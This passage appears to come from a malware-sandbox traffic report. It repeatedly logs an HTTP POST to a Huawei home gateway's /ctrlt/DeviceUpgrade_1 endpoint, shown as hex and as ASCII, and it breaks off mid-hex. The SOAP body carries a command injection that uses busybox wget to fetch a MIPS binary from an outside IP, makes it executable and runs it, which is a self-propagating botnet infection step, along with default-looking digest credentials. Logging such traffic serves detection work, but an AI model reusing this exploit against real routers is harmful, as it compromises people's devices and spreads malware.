62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 